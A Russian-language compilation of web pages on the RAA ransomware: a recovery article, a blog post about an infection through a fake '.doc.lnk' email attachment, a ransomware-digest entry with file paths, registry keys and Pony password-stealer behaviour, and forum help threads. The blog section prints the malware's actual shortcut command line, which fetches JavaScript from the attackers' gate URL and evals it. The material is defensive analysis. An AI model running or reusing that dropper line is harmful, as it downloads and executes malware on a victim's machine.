Как расшифровать вирус raa
RAA (известный еще как RAA SEP .Locked Virus, САР-SEP) – новый шифровальщик, который за несколько часов в “спящем” режиме шифрует все Ваши файлы. Алгоритм AES-256 обеспечивает надежность шифрования и невозможность расшифровать файлы используя общепринятые методы. Шифрованию поддаются основные типы файлов – документы, таблицы, музыка, фото, видео, презентации. Отличительной особенностью данного шифровальщика, от своих других сородичей, является то что написан он на языке JavaScript.
После того как вирус зашифровал файлы (.locked расширение) – Вы увидите следующее сообщение на рабочем столе (в файле readme или в виде обоев).
Ваши файлы были зашифрованы вирусом RAA.
При шифровании был применен алгоритм AES-256, используемый для защиты информации, представляющей государственную тайну.
Это значит, что восстановить данные можно только купив ключ у нас.
Важно (1).
Не пытайтесь подобрать ключ, это бесполезно, и может уничтожить ваши данные окончательно.
Важно (3).
Восстановление Вашей информации без файла KEY-866417BD-74B6-449D-BB86-6A4ECE0C1783 невозможно.
README файлы и файл KEY-866417BD-74B6-449D-BB86-6A4ECE0C1783 расположены в корне каждого диска и на рабочем столе.
RAA – текст вируса блокировщика
Распространение вируса RAA основывается на разнообразных механизмах. Установку конечной инфекции частично обслуживает эксплоит-комплекс. Процедура инфицирования предполагает посещение пользователем взломанных сайтов с эксплуатацией пробелов безопасности такого ПО, как Flash Player, PDF Reader и Java. Это худший из возможных сценариев. Предотвратить заражение практически невозможно – слишком высок уровень скрытности данной технологии. В еще одной схеме используются вложения к эл. почте, которые работают по принципу минного поля: при открытии “взрываются”, автоматически выполняя установку вымогателя. Письма могут быть замаскированы под уведомление Вашего банка, налоговой инспекции, сообщение от бухгалтера и.т.д
Пример спам-рассылки с вирусом RAA в архиве
Следует признать, что расшифровка файлов с расширением .locked практически невозможна Существует ряд альтернативных решений, способных вернуть утраченные данные.
Исключительно эффективный метод работы со зловредным ПО вообще и программами-вымогателями в частности. Использование зарекомендовавшего себя защитного комплекса гарантирует тщательность обнаружения любых вирусных компонентов, их полное удаление одним щелчком мыши. Обратите внимание, речь идет о двух разных процессах: деинсталляции инфекции и восстановления файлов на Вашем ПК. Тем не менее, угроза, безусловно, подлежит удалению, поскольку есть сведения о внедрении прочих компьютерных троянцев с ее помощью.
- Загрузить программу для удаления вируса RAA. После запуска программного средства, нажмите кнопку Start Computer Scan (Начать сканирование). Загрузить программу для удаления шифровальщика RAA.
- Установленное ПО предоставит отчет по обнаруженным в ходе сканирования угрозам. Чтобы удалить все найденные угрозы, выберите опцию Fix Threats (Устранить угрозы). Рассматриваемое зловредное ПО будет полностью удалено.
Как было отмечено, программа-вымогатель RAA блокирует файлы с помощью стойкого алгоритма шифрования, так что зашифрованные данные нельзя возобновить взмахом волшебной палочки – если не принимать в расчет оплату неслыханной суммы выкупа. Но некоторые методы действительно могут стать палочкой-выручалочкой, которая поможет восстановить важные данные. Ниже Вы можете с ними ознакомиться.
Программа автоматического восстановления файлов
Известно весьма неординарное обстоятельство. Данная инфекция стирает исходные файлы в незашифрованном виде. Процесс шифрования с целью вымогательства, таким образом, нацелен на их копии. Это предоставляет возможность таким программным средствам как Data Recovery Pro восстановить стертые объекты, даже если надежность их устранения гарантирована. Настоятельно рекомендуется прибегнуть к процедуре восстановления файлов, ее эффективность не вызывает сомнений.
Теневые копии томов
В основе подхода предусмотренная Windows процедура резервного копирования файлов, которая повторяется в каждой точке восстановления. Важное условие работы данного метода: функция “Восстановление системы” должна быть активирована до момента заражения. При этом любые изменения в файл, внесенные после точки восстановления, в восстановленной версии файла отображаться не будут.
-
Использовать опцию “Предыдущие версии”. В диалоговом окне “Свойства” любого файла есть вкладка Предыдущие версии. Она показывает версии резервных копий и дает возможность их извлечь. Итак, выполняем щечек правой клавишей мыши по файлу, переходим в меню Свойства, активируем необходимую вкладку и выбираем команду Копировать или Восстановить, выбор зависит от желаемого места сохранения восстановленного файла. Использовать инструмент “Теневой проводник” ShadowExplorer
" data-medium-file="https://i1.wp.com/itsecurity-ru.com/wp-content/uploads/2016/04/previous-versions.png?fit=392%2C515&ssl=1" data-large-file="https://i1.wp.com/itsecurity-ru.com/wp-content/uploads/2016/04/previous-versions.png?fit=392%2C515&ssl=1" class="lazyload" data-src="https://i1.wp.com/itsecurity-ru.com/wp-content/uploads/2016/04/previous-versions.png?resize=392%2C515" alt="previous-versions" width="392" height="515" data-recalc-dims="1" />
Резервное копирование
Это самый лучший среди всех не связанных с выкупом способов. Если процедура резервного копирования данных на внешний сервер применялась до момента атаки программы-вымогателя на Ваш компьютер, для восстановления зашифрованных файлов понадобиться попросту войти в соответствующий интерфейс, выбрать необходимые файлы и запустить механизм восстановления данных из резерва. Перед выполнением операции необходимо удостовериться, что вымогательское ПО полностью удалено.
Очистка в ручном режиме чревата упущением отдельных фрагментов вымогательского ПО, которые могут избежать удаления в виде скрытных объектов операционной системы или элементов реестра. Чтобы исключить риск частичного сохранения отдельных зловредных элементов, выполните сканирование Вашего компьютера с помощью надежного защитного программного комплекса, специализирующегося на зловредном ПО.
Все, чем занимаюсь на работе: компьютеры, автоматизация, контроллеры, программирование и т.д.
вторник, 2 августа 2016 г.
Коротко:
Вирус-шифровальщик файлов RAA распространяется через почту, шифрует
.doc, .xls, .rtf, .pdf, .zip, .jpg, базы 1С и другие файлы. К зашифрованным файлам вирус добавляет расширение .locked.
Для расшифровки файлов требует денег. Расшифровать файлы самостоятельно можно самому с помощью этих действий.
Подробно:
Пришло сотруднику на почту письмо, в письме был вложен якобы вордовский документ "Для партнеров ТЕНДЕР.doc.lnk". Кстати, названия документов меняются, вирусопускатели используют для них разные имена.
По расширению *.lnk для мало-мальски грамотного человека сразу очевидно, что это ярлык, а не вордовский документ для тендера и открывать оное на своем компьютере чревато.
Но на такое фуфло часто ведутся невежи, как следствие- после "открытия документа" запускается процесс шифрования документов форматов .doc, .xls, .rtf, .pdf, .zip, .jpg, базы 1С и других. К зашифрованным файлам добавляется расширение .locked.
Просто удалить расширение *.locked и нормально открыть зашифрованные файлы в ворде и экселе, например, невозможно- показывает белиберду. Файлы нужно сначала расшифровать.
Для шифрования вирус подключается по интернету к некоемому сайту и шифрует документы по алгоритму, указанному в свойствах ярлыка. Вот командная строка в этом "ярлыке-вирусе":
%windir%\system32\cmd.exe /c REM.>op.js&echo var w=["Msxml2.ServerXMLHTTP.6.0","GET","http://say-helloworld.com/src/gate.php?a","open","send","responseText"];var pp= new ActiveXObject(w[0]);pp[w[3]](w[1],w[2],false);pp[w[4]]();eval(pp[w[5]]);>op.js&op.js
После шифрования вирус создает на рабочем столе документ ". README. qUhkZ.rtf" с таким содержанием:
Важно (1).
Не пытайтесь подобрать ключ, это бесполезно, и может уничтожить ваши данные окончательно.
Важно (3).
Мы НЕ МОЖЕМ хранить ваши ключи вечно. Все ключи , за которые не было выплачено вознаграждение, удаляются в течение недели с момента заражения .
README файлы расположены в корне каждого диска.
Интересно, что твари не лишены эстетических чувств- раскрасили текст-попрошайку цветными карандашами.
Еще умилил пункт 5: Предпринять меры по предотвращению подобных ситуаций в дальнейшем. Как благородно, ми-ми-ми-ми. Понятно, что подсознательно пареньки понимают, что занимаются нехорошими делами и как бы перекладывают вину на пострадавшего, мол, "ты сам дурак, будь впредь внимателен, а нам скажи спасибо за науку и вообще, не мы такие а жизнь такая".
Но пареньки-вирусописатели пусть тут не обольщаются: своими деяниями они активно минусуют себе карму. И не сейчас, но через 2-3 года, когда запас прочности истощится, награда таки найдет своих героев.
И тогда один из них попадет в поле зрения органов и отправится тренировать дряблую мускулатуру на лесоповалах Мордовии в компании с брутальными почитателями творчества Ивана Кучина, с которыми будет страшно мыться в душе. А другого во время кутежа с ворованными денежками на Цейлоне поймают в рабство тигры освобождения Тамил-Илама и заставят батрачить на выращивании риса с пытками отсутствия интернета и другими противоестественными действиями, о которых не при дамах. Может быть тогда пареньки задумаются, что нужно было не красть чужое, а податься в скрипачи, как советовал дядя Изя. Но это будет потом, а пока парни считают, что поймали бога за бороду и надоят счастья у простофиль.
Программа rakhnidecryptor подобрала ключ за 23 часа работы(ПК с cpu athlon x2 240, ddr2 2 Gb) и благополучно расшифровала файлы *.locked
С чем и поздравляю вымогателей:
UPD1
Судя по камментам, иногда с помощью указанной процедуры не удается расшифровать файлы. Ну не знаю, у меня все получилось. Могу только посоветовать точно выполнять инструкции: отключить ПК от интернета, вылечить вирус, запустить дешифровщик.
UPD2
У кого получилось расшифровать, напишите в камментах. А то создается впечатление, что только я нормально дешифровал.
Шифровальщик (вирус-шантажист). Защита от программ-шифровальщиков. Как удалить вирус-шифровальщик?
Шифровальщики — это вредоносные программы, которые шифруют файлы и требуют выкуп за их расшифровку.
Данный сайт — это ДАЙДЖЕСТ и ПЕРВОИСТОЧНИК информации о шифровальщиках и всевозможных вымогателях.
Авторские статьи, инструкции для пострадавших, рекомендации по защите и профилактике угрозы Ransomware.
воскресенье, 12 июня 2016 г.
RAA (RAA SEP) Ransomware
и $ в имени.
При шифровании пропускаются следующие пути:
Windows, RECYCLER, Program Files, Program Files (x86), Recycle.Bin, APPDATA, TEMP, ProgramData, Microsoft
Описание в энциклопедии TrendMicro >>
Файлы, связанные с RAA Ransomware:
%Desktop%\. README. [id].rtf
%MyDocuments%\doc_attached_[random_chars]
%MyDocuments%\st.exe
Записи реестра, связанные с RAA Ransomware:
HKCU\RAA\Raa-fnl
HKCU\Software\Microsoft\Windows\CurrentVersion\Run @ = "[path_to_JS_file]"
Подробнее о работе трояна Pony
1. Pony находится закодированном в Base64 исполняемом файле, запускающемся после шифрования.
Он ворует следующую конфиденциальную информацию:
- сохраненные в браузере пароли;
- логин-пароли для FTP-клиентов;
- учетные данные почтовых клиентов;
- информацию о кошельках криптовалют;
- установленные цифровые сертификаты;
- список распространенных паролей.
2. Собранную информацию Pony шифрует с помощью алгоритма RC4 и отправляет на C&C-сервер злоумышленников. При этом он фиксирует контрольные суммы всех полученных данных, выполняя действия в определённой последовательности:
1) подсчет контрольной суммы от незашифрованных данных;
2) добавление полученного значения к входным данным;
3) шифрование входных данных алгоритмом RC4 с заданным преступниками ключом;
4) подсчет контрольной суммы от зашифрованных данных;
5) добавление полученного значения к входным данным;
6) генерация случайного ключа длиной в 4 байта;
7) шифрование входных данных алгоритмом RC4, используя сгенерированный ключ;
8) формирование готовых к отправке данных.
ВНИМАНИЕ.
Новые комментарии модерируются. Всё, кроме спама, вскоре будет опубликовано. Чтобы написать комментарий, вы должны иметь аккаунт Google.
УВАГА.
Новыя каментары мадэруюцца. Усё, акрамя спаму, неўзабаве будзе апублікавана. Каб напісаць каментар, вы павінны мець аккаунт Google.
УВАГА.
Нові коментарі модеруються. Все, крім спаму, незабаром буде опубліковано. Щоб написати коментар, ви повинні мати акаунт Google.
ПАЖЊА.
Нови коментари су модерирани. Све, осим спама, ускоро ће бити објављено. Да бисте напишете коментар, морате да имате Google рачун.
НАЗАР АУДАРЫҢЫЗ.
Жаңа пікірлер модерацияланған. Жақын арада спамнан басқа, барлығы да жарияланатын болады. Пікір жазу үшін сізге google тіркелгісі болуы керек.
ATTENTION.
Your new comment will be moderated. Do not repeat its, please. Spam will be deleted. To write here a comment, you must have a Google account.
BEACHTUNG.
Ihr neuer Kommentar wird moderiert. Wiederhole es bitte nicht. Spam wird gelöscht. Um hier einen Kommentar zu schreiben, benötigen Sie ein Google-Konto.
ATTENTION.
Votre nouveau commentaire sera modéré. Ne répétez pas le, s'il vous plaît. Le spam sera supprimé.
¡ATENCIÓN!
Tu nuevo comentario será moderado. No lo repitas, por favor. El spam se eliminará.
ATENÇÃO.
Seu novo comentário será moderado. Não repita, por favor. O spam será excluído.
ATTENZIONE.
Il tuo nuovo commento verrà moderato. Non ripeterlo, per favore. Lo spam verrà eliminato.
ATENTO!
Via nova komento estos moderata. Ne ripetu ĝin, bonvolu. Spam estos forigita.
DİKKAT .
Yorumunuz moderatör tarafından kontrol edilecektir. Tekrar etmeyin lütfen. Spam silinecek.
इसे पढ़ें .
आपकी नई टिप्पणी को नियंत्रित किया जाएगा। कृपया इसे दोहराना न करें। स्पैम हटा दिया जाएगा।
এটা পড়ুন .
আপনার নতুন মন্তব্য সংযত করা হবে। এটা পুনরাবৃত্তি করবেন না দয়া করে। স্প্যাম মুছে ফেলা হবে।
انتباه!
سيتم الإشراف على تعليقاتك الجديدة. لا تكررها من فضلك. سيتم حذف الرسائل غير المرغوب فيها.
PERHATIAN.
Komentar baru Anda akan dimoderasi. Jangan mengulanginya, tolong. Spam akan dihapus.
Pansin .
Ang mga bagong komento ay sinusuri ng moderator. Huwag ulitin ito, mangyaring. Tatanggalin ang spam.
注意!!!
您的新评论将被审核。 请不要重复它。 垃圾邮件将被删除。
これを読んで!
あなたの新しいコメントはモデレートされます。 それを繰り返さないでください。 スパムは削除されます。
주의.
새 댓글이 검토 될 것입니다. 그것을 복제하지 마십시오. 스팸이 삭제됩니다.
Новички
помогите пожалуйста расшифровать файлы зашифрованные вирусом RAA AES-256. файлы зашифровывались с разрешением LOCKED.
[mod='Mark D. Pearlstone']Перемещено из темы[/mod]
Новички
После открытия запароленного zip-архива файлы были зашифрованы вирусом RAA. Злоумышленник написал о применении алгоритма AES-256. Помогите расшифровать эту беду.
[mod='Mark D. Pearlstone']Темы объединены[/mod]
Консультанты
Старожилы
Скачайте Farbar Recovery Scan Tool (зеркало) и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
Новички
Консультанты
Старожилы
Reimage Protector устанавливали самостоятельно?
Новички
Reimage Protector устанавливали самостоятельно?
Нет не устанавивал
Reimage Protector устанавливали самостоятельно?
Нет не устанавивал
вернее не помню, в ближайшее время точно не устанавливал
Консультанты
Старожилы
Новички
Консультанты
Старожилы
Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:
и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool.
Отключите до перезагрузки антивирус, запустите FRST, нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.
Подробнее читайте в этом руководстве.
Новички
Консультанты
Старожилы
Читайте также:
